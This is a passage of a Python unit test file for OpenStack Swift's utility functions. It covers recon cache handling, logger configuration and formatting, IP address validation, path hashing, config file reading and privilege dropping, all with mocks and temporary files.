'value2': 2}}} expect_dict = {'key0': 101, 'key1': {'key2': {'value1': 1, 'value2': 2}, 'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # nested dict items are not sticky submit_dict = {'key1': {'key2': {'value3': 3}}} expect_dict = {'key0': 101, 'key1': {'key2': {'value3': 3}, 'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # cached entries are sticky submit_dict = {} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # nested dicts can be erased... submit_dict = {'key1': {'key2': {}}} expect_dict = {'key0': 101, 'key1': {'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # ... and erasure is idempotent utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # top level dicts can be erased... submit_dict = {'key1': {}} expect_dict = {'key0': 101} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # ... and erasure is idempotent utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) finally: rmtree(testdir_base) def test_dump_recon_cache_set_owner(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') logger = utils.get_logger(None, 'server', log_route='server') try: submit_dict = {'key1': {'value1': 1, 'value2': 2}} _ret = lambda: None _ret.pw_uid = 100 _mock_getpwnam = MagicMock(return_value=_ret) _mock_chown = mock.Mock() with patch('os.chown', _mock_chown), \ patch('pwd.getpwnam', _mock_getpwnam): utils.dump_recon_cache(submit_dict, testcache_file, logger, set_owner="swift") _mock_getpwnam.assert_called_once_with("swift") self.assertEqual(_mock_chown.call_args[0][1], 100) finally: rmtree(testdir_base) def test_dump_recon_cache_permission_denied(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') class MockLogger(object): def __init__(self): self._excs = [] def exception(self, message): _junk, exc, _junk = sys.exc_info() self._excs.append(exc) logger = MockLogger() try: submit_dict = {'key1': {'value1': 1, 'value2': 2}} with mock.patch( 'swift.common.utils.NamedTemporaryFile', side_effect=IOError(13, 'Permission Denied')): utils.dump_recon_cache(submit_dict, testcache_file, logger) self.assertIsInstance(logger._excs[0], IOError) finally: rmtree(testdir_base) def test_load_recon_cache(self): stub_data = {'test': 'foo'} with NamedTemporaryFile() as f: f.write(json.dumps(stub_data).encode("utf-8")) f.flush() self.assertEqual(stub_data, utils.load_recon_cache(f.name)) # missing files are treated as empty self.assertFalse(os.path.exists(f.name)) # sanity self.assertEqual({}, utils.load_recon_cache(f.name)) # Corrupt files are treated as empty. 
        # We could crash and make an
        # operator fix the corrupt file, but they'll "fix" it with "rm -f
        # /var/cache/swift/*.recon", so let's just do it for them.
        with NamedTemporaryFile() as f:
            f.write(b"{not [valid (json")
            f.flush()
            self.assertEqual({}, utils.load_recon_cache(f.name))

    def test_get_logger(self):
        sio = StringIO()
        logger = logging.getLogger('server')
        logger.addHandler(logging.StreamHandler(sio))
        logger = utils.get_logger(None, 'server', log_route='server')
        logger.warning('test1')
        self.assertEqual(sio.getvalue(), 'test1\n')
        logger.debug('test2')
        self.assertEqual(sio.getvalue(), 'test1\n')
        logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
                                  log_route='server')
        logger.debug('test3')
        self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
        # Doesn't really test that the log facility is truly being used all
        # the way to syslog; but exercises the code.
        logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
                                  log_route='server')
        logger.warning('test4')
        self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\n')
        # make sure debug doesn't log by default
        logger.debug('test5')
        self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\n')
        # make sure notice lvl logs by default
        logger.notice('test6')
        self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\ntest6\n')

    def test_get_logger_sysloghandler_plumbing(self):
        orig_sysloghandler = utils.ThreadSafeSysLogHandler
        syslog_handler_args = []

        def syslog_handler_catcher(*args, **kwargs):
            syslog_handler_args.append((args, kwargs))
            return orig_sysloghandler(*args, **kwargs)

        syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
        syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3

        # Some versions of python perform host resolution while initializing
        # the handler. See https://bugs.python.org/issue30378
        orig_getaddrinfo = socket.getaddrinfo

        def fake_getaddrinfo(host, *args):
            return orig_getaddrinfo('localhost', *args)

        with mock.patch.object(utils, 'ThreadSafeSysLogHandler',
                               syslog_handler_catcher), \
                mock.patch.object(socket, 'getaddrinfo', fake_getaddrinfo):
            utils.get_logger({
                'log_facility': 'LOG_LOCAL3',
            }, 'server', log_route='server')
            expected_args = [((), {'address': '/dev/log',
                                   'facility': orig_sysloghandler.LOG_LOCAL3})]
            if not os.path.exists('/dev/log') or \
                    os.path.isfile('/dev/log') or \
                    os.path.isdir('/dev/log'):
                # Since socket on OSX is in /var/run/syslog, there will be
                # a fallback to UDP.
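                # (Hedged sketch of that fallback, assuming the stock
                # logging.handlers.SysLogHandler defaults: with no usable
                # '/dev/log' socket, get_logger is expected to omit the
                # 'address' argument, so SysLogHandler falls back to its
                # default UDP address of ('localhost', SYSLOG_UDP_PORT).)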
expected_args.append( ((), {'facility': orig_sysloghandler.LOG_LOCAL3})) self.assertEqual(expected_args, syslog_handler_args) syslog_handler_args = [] utils.get_logger({ 'log_facility': 'LOG_LOCAL3', 'log_address': '/foo/bar', }, 'server', log_route='server') self.assertEqual( ((), {'address': '/foo/bar', 'facility': orig_sysloghandler.LOG_LOCAL3}), syslog_handler_args[0]) # Using UDP with default port syslog_handler_args = [] utils.get_logger({ 'log_udp_host': 'syslog.funtimes.com', }, 'server', log_route='server') self.assertEqual([ ((), {'address': ('syslog.funtimes.com', logging.handlers.SYSLOG_UDP_PORT), 'facility': orig_sysloghandler.LOG_LOCAL0})], syslog_handler_args) # Using UDP with non-default port syslog_handler_args = [] utils.get_logger({ 'log_udp_host': 'syslog.funtimes.com', 'log_udp_port': '2123', }, 'server', log_route='server') self.assertEqual([ ((), {'address': ('syslog.funtimes.com', 2123), 'facility': orig_sysloghandler.LOG_LOCAL0})], syslog_handler_args) @reset_logger_state def test_clean_logger_exception(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v def log_exception(exc): try: raise exc except (Exception, Timeout): logger.exception('blah') try: # establish base case self.assertEqual(strip_value(sio), '') logger.info('test') self.assertEqual(strip_value(sio), 'test\n') self.assertEqual(strip_value(sio), '') logger.info('test') logger.info('test') self.assertEqual(strip_value(sio), 'test\ntest\n') self.assertEqual(strip_value(sio), '') # test OSError for en in (errno.EIO, errno.ENOSPC): log_exception(OSError(en, 'my %s error message' % en)) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertIn('my %s error message' % en, log_msg) # unfiltered log_exception(OSError()) self.assertTrue('Traceback' in strip_value(sio)) # test socket.error log_exception(socket.error(errno.ECONNREFUSED, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('errno.ECONNREFUSED message test', log_msg) self.assertIn('Connection refused', log_msg) log_exception(socket.error(errno.EHOSTUNREACH, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('my error message', log_msg) self.assertIn('Host unreachable', log_msg) log_exception(socket.error(errno.ETIMEDOUT, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('my error message', log_msg) self.assertIn('Connection timeout', log_msg) # unfiltered log_exception(socket.error(0, 'my error message')) log_msg = strip_value(sio) self.assertIn('Traceback', log_msg) self.assertIn('my error message', log_msg) # test eventlet.Timeout connection_timeout = ConnectionTimeout(42, 'my error message') log_exception(connection_timeout) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertTrue('ConnectionTimeout' in log_msg) self.assertTrue('(42s)' in log_msg) self.assertNotIn('my error message', log_msg) connection_timeout.cancel() message_timeout = MessageTimeout(42, 'my error message') log_exception(message_timeout) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertTrue('MessageTimeout' in log_msg) self.assertTrue('(42s)' in log_msg) self.assertTrue('my error message' in log_msg) message_timeout.cancel() # test BadStatusLine 
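            # (Hedged note: http_client.BadStatusLine is the stdlib
            # http.client/httplib exception raised when a server sends back
            # an empty or unparseable status line; as asserted below, it
            # should be logged tersely, without a traceback.)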
log_exception(http_client.BadStatusLine('')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertIn('BadStatusLine', log_msg) self.assertIn("''", log_msg) # test unhandled log_exception(Exception('my error message')) log_msg = strip_value(sio) self.assertTrue('Traceback' in log_msg) self.assertTrue('my error message' in log_msg) finally: logger.logger.removeHandler(handler) @reset_logger_state def test_swift_log_formatter_max_line_length(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) formatter = utils.SwiftLogFormatter(max_line_length=10) handler.setFormatter(formatter) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v try: logger.info('12345') self.assertEqual(strip_value(sio), '12345\n') logger.info('1234567890') self.assertEqual(strip_value(sio), '1234567890\n') logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12 ... de\n') formatter.max_line_length = 11 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123 ... cde\n') formatter.max_line_length = 0 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234567890abcde\n') formatter.max_line_length = 1 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1\n') formatter.max_line_length = 2 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12\n') formatter.max_line_length = 3 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123\n') formatter.max_line_length = 4 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234\n') formatter.max_line_length = 5 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '12345\n') formatter.max_line_length = 6 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '123456\n') formatter.max_line_length = 7 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1 ... 
e\n') formatter.max_line_length = -10 logger.info('1234567890abcde') self.assertEqual(strip_value(sio), '1234567890abcde\n') finally: logger.logger.removeHandler(handler) @reset_logger_state def test_swift_log_formatter(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) handler.setFormatter(utils.SwiftLogFormatter()) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v try: self.assertFalse(logger.txn_id) logger.error('my error message') log_msg = strip_value(sio) self.assertIn('my error message', log_msg) self.assertNotIn('txn', log_msg) logger.txn_id = '12345' logger.error('test') log_msg = strip_value(sio) self.assertIn('txn', log_msg) self.assertIn('12345', log_msg) # test txn in info message self.assertEqual(logger.txn_id, '12345') logger.info('test') log_msg = strip_value(sio) self.assertIn('txn', log_msg) self.assertIn('12345', log_msg) # test txn already in message self.assertEqual(logger.txn_id, '12345') logger.warning('test 12345 test') self.assertEqual(strip_value(sio), 'test 12345 test\n') # Test multi line collapsing logger.error('my\nerror\nmessage') log_msg = strip_value(sio) self.assertIn('my#012error#012message', log_msg) # test client_ip self.assertFalse(logger.client_ip) logger.error('my error message') log_msg = strip_value(sio) self.assertIn('my error message', log_msg) self.assertNotIn('client_ip', log_msg) logger.client_ip = '1.2.3.4' logger.error('test') log_msg = strip_value(sio) self.assertIn('client_ip', log_msg) self.assertIn('1.2.3.4', log_msg) # test no client_ip on info message self.assertEqual(logger.client_ip, '1.2.3.4') logger.info('test') log_msg = strip_value(sio) self.assertNotIn('client_ip', log_msg) self.assertNotIn('1.2.3.4', log_msg) # test client_ip (and txn) already in message self.assertEqual(logger.client_ip, '1.2.3.4') logger.warning('test 1.2.3.4 test 12345') self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n') finally: logger.logger.removeHandler(handler) def test_storage_directory(self): self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'), 'objects/1/DEF/ABCDEF') def test_is_valid_ip(self): self.assertTrue(is_valid_ip("127.0.0.1")) self.assertTrue(is_valid_ip("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "fe80::" self.assertTrue(is_valid_ip(ipv6)) ipv6 = "::1" self.assertTrue(is_valid_ip(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ip(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ip(not_ipv6)) def test_is_valid_ipv4(self): self.assertTrue(is_valid_ipv4("127.0.0.1")) self.assertTrue(is_valid_ipv4("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" 
self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "fe80::" self.assertFalse(is_valid_ipv4(ipv6)) ipv6 = "::1" self.assertFalse(is_valid_ipv4(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ipv4(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ipv4(not_ipv6)) def test_is_valid_ipv6(self): self.assertFalse(is_valid_ipv6("127.0.0.1")) self.assertFalse(is_valid_ipv6("10.0.0.1")) ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::204:61ff:fe9d:f156" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::204:61ff:254.157.241.86" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "fe80::" self.assertTrue(is_valid_ipv6(ipv6)) ipv6 = "::1" self.assertTrue(is_valid_ipv6(ipv6)) not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a" self.assertFalse(is_valid_ipv6(not_ipv6)) not_ipv6 = "1:2:3:4:5:6::7:8" self.assertFalse(is_valid_ipv6(not_ipv6)) def test_expand_ipv6(self): expanded_ipv6 = "fe80::204:61ff:fe9d:f156" upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6)) omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6)) less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156" self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6)) def test_whataremyips(self): myips = utils.whataremyips() self.assertTrue(len(myips) > 1) self.assertTrue('127.0.0.1' in myips) def test_whataremyips_bind_to_all(self): for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000', '::0', '::0000', '::', # Wacky parse-error input produces all IPs 'I am a bear'): myips = utils.whataremyips(any_addr) self.assertTrue(len(myips) > 1) self.assertTrue('127.0.0.1' in myips) def test_whataremyips_bind_ip_specific(self): self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4')) def test_whataremyips_error(self): def my_interfaces(): return ['eth0'] def my_ifaddress_error(interface): raise ValueError with patch('netifaces.interfaces', my_interfaces), \ patch('netifaces.ifaddresses', my_ifaddress_error): self.assertEqual(utils.whataremyips(), []) def test_whataremyips_ipv6(self): test_ipv6_address = '2001:6b0:dead:beef:2::32' test_interface = 'eth0' def my_ipv6_interfaces(): return ['eth0'] def my_ipv6_ifaddresses(interface): return {AF_INET6: [{'netmask': 'ffff:ffff:ffff:ffff::', 'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]} with patch('netifaces.interfaces', my_ipv6_interfaces), \ patch('netifaces.ifaddresses', my_ipv6_ifaddresses): myips = utils.whataremyips() self.assertEqual(len(myips), 1) self.assertEqual(myips[0], test_ipv6_address) def test_hash_path(self): # Yes, these tests are deliberately very fragile. 
We want to make sure # that if someones changes the results hash_path produces, they know it with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''): self.assertEqual(utils.hash_path('a'), '1c84525acb02107ea475dcd3d09c2c58') self.assertEqual(utils.hash_path('a', 'c'), '33379ecb053aa5c9e356c68997cbb59e') self.assertEqual(utils.hash_path('a', 'c', 'o'), '06fbf0b514e5199dfc4e00f42eb5ea83') self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False), '06fbf0b514e5199dfc4e00f42eb5ea83') self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True), b'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN' b'\x00\xf4.\xb5\xea\x83') self.assertRaises(ValueError, utils.hash_path, 'a', object='o') utils.HASH_PATH_PREFIX = b'abcdef' self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False), '363f9b535bfb7d17a43a46a358afca0e') def test_validate_hash_conf(self): # no section causes InvalidHashPathConfigError self._test_validate_hash_conf([], [], True) # 'swift-hash' section is there but no options causes # InvalidHashPathConfigError self._test_validate_hash_conf(['swift-hash'], [], True) # if we have the section and either of prefix or suffix, # InvalidHashPathConfigError doesn't occur self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_prefix'], False) self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_suffix'], False) # definitely, we have the section and both of them, # InvalidHashPathConfigError doesn't occur self._test_validate_hash_conf( ['swift-hash'], ['swift_hash_path_suffix', 'swift_hash_path_prefix'], False) # But invalid section name should make an error even if valid # options are there self._test_validate_hash_conf( ['swift-hash-xxx'], ['swift_hash_path_suffix', 'swift_hash_path_prefix'], True) # Unreadable/missing swift.conf causes IOError # We mock in case the unit tests are run on a laptop with SAIO, # which does have a natural /etc/swift/swift.conf. 
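        # (For reference, a minimal swift.conf that the checks exercised
        # above would accept looks roughly like:
        #     [swift-hash]
        #     swift_hash_path_suffix = changeme
        # i.e. a [swift-hash] section with at least one of the prefix/suffix
        # options set; 'changeme' is only a placeholder value.)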
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''), \ mock.patch('swift.common.utils.HASH_PATH_SUFFIX', b''), \ mock.patch('swift.common.utils.SWIFT_CONF_FILE', '/nosuchfile'), \ self.assertRaises(IOError): utils.validate_hash_conf() def _test_validate_hash_conf(self, sections, options, should_raise_error): class FakeConfigParser(object): def readfp(self, fp): pass def get(self, section, option): if section not in sections: raise NoSectionError('section error') elif option not in options: raise NoOptionError('option error', 'this option') else: return 'some_option_value' with mock.patch('swift.common.utils.HASH_PATH_PREFIX', b''), \ mock.patch('swift.common.utils.HASH_PATH_SUFFIX', b''), \ mock.patch('swift.common.utils.SWIFT_CONF_FILE', '/dev/null'), \ mock.patch('swift.common.utils.ConfigParser', FakeConfigParser): try: utils.validate_hash_conf() except utils.InvalidHashPathConfigError: if not should_raise_error: self.fail('validate_hash_conf should not raise an error') else: if should_raise_error: self.fail('validate_hash_conf should raise an error') def test_load_libc_function(self): self.assertTrue(callable( utils.load_libc_function('printf'))) self.assertTrue(callable( utils.load_libc_function('some_not_real_function'))) self.assertRaises(AttributeError, utils.load_libc_function, 'some_not_real_function', fail_if_missing=True) def test_readconf(self): conf = '''[section1] foo = bar [section2] log_name = yarr''' # setup a real file fd, temppath = tempfile.mkstemp() with os.fdopen(fd, 'w') as f: f.write(conf) make_filename = lambda: temppath # setup a file stream make_fp = lambda: StringIO(conf) for conf_object_maker in (make_filename, make_fp): conffile = conf_object_maker() result = utils.readconf(conffile) expected = {'__file__': conffile, 'log_name': None, 'section1': {'foo': 'bar'}, 'section2': {'log_name': 'yarr'}} self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1') expected = {'__file__': conffile, 'log_name': 'section1', 'foo': 'bar'} self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section2').get('log_name') expected = 'yarr' self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1', log_name='foo').get('log_name') expected = 'foo' self.assertEqual(result, expected) conffile = conf_object_maker() result = utils.readconf(conffile, 'section1', defaults={'bar': 'baz'}) expected = {'__file__': conffile, 'log_name': 'section1', 'foo': 'bar', 'bar': 'baz'} self.assertEqual(result, expected) self.assertRaisesRegexp( ValueError, 'Unable to find section3 config section in.*', utils.readconf, temppath, 'section3') os.unlink(temppath) self.assertRaises(IOError, utils.readconf, temppath) def test_readconf_raw(self): conf = '''[section1] foo = bar [section2] log_name = %(yarr)s''' # setup a real file fd, temppath = tempfile.mkstemp() with os.fdopen(fd, 'w') as f: f.write(conf) make_filename = lambda: temppath # setup a file stream make_fp = lambda: StringIO(conf) for conf_object_maker in (make_filename, make_fp): conffile = conf_object_maker() result = utils.readconf(conffile, raw=True) expected = {'__file__': conffile, 'log_name': None, 'section1': {'foo': 'bar'}, 'section2': {'log_name': '%(yarr)s'}} self.assertEqual(result, expected) os.unlink(temppath) self.assertRaises(IOError, utils.readconf, temppath) def test_readconf_dir(self): config_dir = { 'server.conf.d/01.conf': """ [DEFAULT] port = 8080 foo = bar 
[section1] name=section1 """, 'server.conf.d/section2.conf': """ [DEFAULT] port = 8081 bar = baz [section2] name=section2 """, 'other-server.conf.d/01.conf': """ [DEFAULT] port = 8082 [section3] name=section3 """ } # strip indent from test config contents config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items()) with temptree(*zip(*config_dir.items())) as path: conf_dir = os.path.join(path, 'server.conf.d') conf = utils.readconf(conf_dir) expected = { '__file__': os.path.join(path, 'server.conf.d'), 'log_name': None, 'section1': { 'port': '8081', 'foo': 'bar', 'bar': 'baz', 'name': 'section1', }, 'section2': { 'port': '8081', 'foo': 'bar', 'bar': 'baz', 'name': 'section2', }, } self.assertEqual(conf, expected) def test_readconf_dir_ignores_hidden_and_nondotconf_files(self): config_dir = { 'server.conf.d/01.conf': """ [section1] port = 8080 """, 'server.conf.d/.01.conf.swp': """ [section] port = 8081 """, 'server.conf.d/01.conf-bak': """ [section] port = 8082 """, } # strip indent from test config contents config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items()) with temptree(*zip(*config_dir.items())) as path: conf_dir = os.path.join(path, 'server.conf.d') conf = utils.readconf(conf_dir) expected = { '__file__': os.path.join(path, 'server.conf.d'), 'log_name': None, 'section1': { 'port': '8080', }, } self.assertEqual(conf, expected) def test_drop_privileges(self): required_func_calls = ('setgroups', 'setgid', 'setuid') mock_os = MockOs(called_funcs=required_func_calls) user = getuser() user_data = pwd.getpwnam(user) self.assertFalse(mock_os.called_funcs) # sanity check # over-ride os with mock with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.drop_privileges(user) for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertEqual(user_data[5], mock_os.environ['HOME']) groups = {g.gr_gid for g in grp.getgrall() if user in g.gr_mem} self.assertEqual(groups, set(mock_os.called_funcs['setgroups'][0])) self.assertEqual(user_data[3], mock_os.called_funcs['setgid'][0]) self.assertEqual(user_data[2], mock_os.called_funcs['setuid'][0]) def test_drop_privileges_no_setgroups(self): required_func_calls = ('geteuid', 'setgid', 'setuid') mock_os = MockOs(called_funcs=required_func_calls) user = getuser() user_data = pwd.getpwnam(user) self.assertFalse(mock_os.called_funcs) # sanity check # over-ride os with mock with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.drop_privileges(user) for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertNotIn('setgroups', mock_os.called_funcs) self.assertEqual(user_data[5], mock_os.environ['HOME']) self.assertEqual(user_data[3], mock_os.called_funcs['setgid'][0]) self.assertEqual(user_data[2], mock_os.called_funcs['setuid'][0]) def test_clean_up_daemon_hygene(self): required_func_calls = ('chdir', 'umask') # OSError if trying to get session leader, but setsid() OSError is # ignored by the code under test. 
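        # (Sketch, inferred only from the assertions below: the call is
        # expected to chdir('/'), set umask(0o22) and call os.setsid(),
        # ignoring the OSError that setsid() raises when the process is
        # already a session/group leader.)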
bad_func_calls = ('setsid',) mock_os = MockOs(called_funcs=required_func_calls, raise_funcs=bad_func_calls) with mock.patch('swift.common.utils.os', mock_os): # exercise the code utils.clean_up_daemon_hygiene() for func in required_func_calls: self.assertIn(func, mock_os.called_funcs) for func in bad_func_calls: self.assertIn(func, mock_os.called_funcs) self.assertEqual('/', mock_os.called_funcs['chdir'][0]) self.assertEqual(0o22, mock_os.called_funcs['umask'][0]) @reset_logger_state def test_capture_stdio(self): # stubs logger = utils.get_logger(None, 'dummy') # mock utils system modules _orig_sys = utils.sys _orig_os = utils.os try: utils.sys = MockSys() utils.os = MockOs() # basic test utils.capture_stdio(logger) self.assertTrue(utils.sys.excepthook is not None) self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds) self.assertTrue( isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertTrue( isinstance(utils.sys.stderr, utils.LoggerFileObject)) # reset; test same args, but exc when trying to close stdio utils.os = MockOs(raise_funcs=('dup2',)) utils.sys = MockSys() # test unable to close stdio utils.capture_stdio(logger) self.assertTrue(utils.sys.excepthook is not None) self.assertEqual(utils.os.closed_fds, []) self.assertTrue( isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertTrue( isinstance(utils.sys.stderr, utils.LoggerFileObject)) # reset; test some other args utils.os = MockOs() utils.sys = MockSys() logger = utils.get_logger(None, log_to_console=True) # test console log utils.capture_stdio(logger, capture_stdout=False, capture_stderr=False) self.assertTrue(utils.sys.excepthook is not None) # when logging to console, stderr remains open self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2]) reset_loggers() # stdio not captured self.assertFalse(isinstance(utils.sys.stdout, utils.LoggerFileObject)) self.assertFalse(isinstance(utils.sys.stderr, utils.LoggerFileObject)) finally: utils.sys = _orig_sys utils.os = _orig_os @reset_logger_state def test_get_logger_console(self): logger = utils.get_logger(None) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertFalse(console_handlers) logger = utils.get_logger(None, log_to_console=True) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertTrue(console_handlers) # make sure you can't have two console handlers self.assertEqual(len(console_handlers), 1) old_handler = console_handlers[0] logger = utils.get_logger(None, log_to_console=True) console_handlers = [h for h in logger.logger.handlers if isinstance(h, logging.StreamHandler)] self.assertEqual(len(console_handlers), 1) new_handler = console_handlers[0] self.assertNotEqual(new_handler, old_handler) def verify_under_pseudo_time( self, func, target_runtime_ms=1, *args, **kwargs): curr_time = [42.0] def my_time(): curr_time[0] += 0.001 return curr_time[0] def my_sleep(duration): curr_time[0] += 0.001 curr_time[0] += duration with patch('time.time', my_time), \ patch('time.sleep', my_sleep), \ patch('eventlet.sleep', my_sleep): start = time.time() func(*args, **kwargs) # make sure it's accurate to 10th of a second, converting the time # difference to milliseconds, 100 milliseconds is 1/10 of a second diff_from_target_ms = abs( target_runtime_ms - ((time.time() - start) * 1000)) self.assertTrue(diff_from_target_ms < 100, "Expected %d < 100" % diff_from_target_ms) def test_ratelimit_sleep(self): def testfunc(): running_time = 0 for i in range(100): 
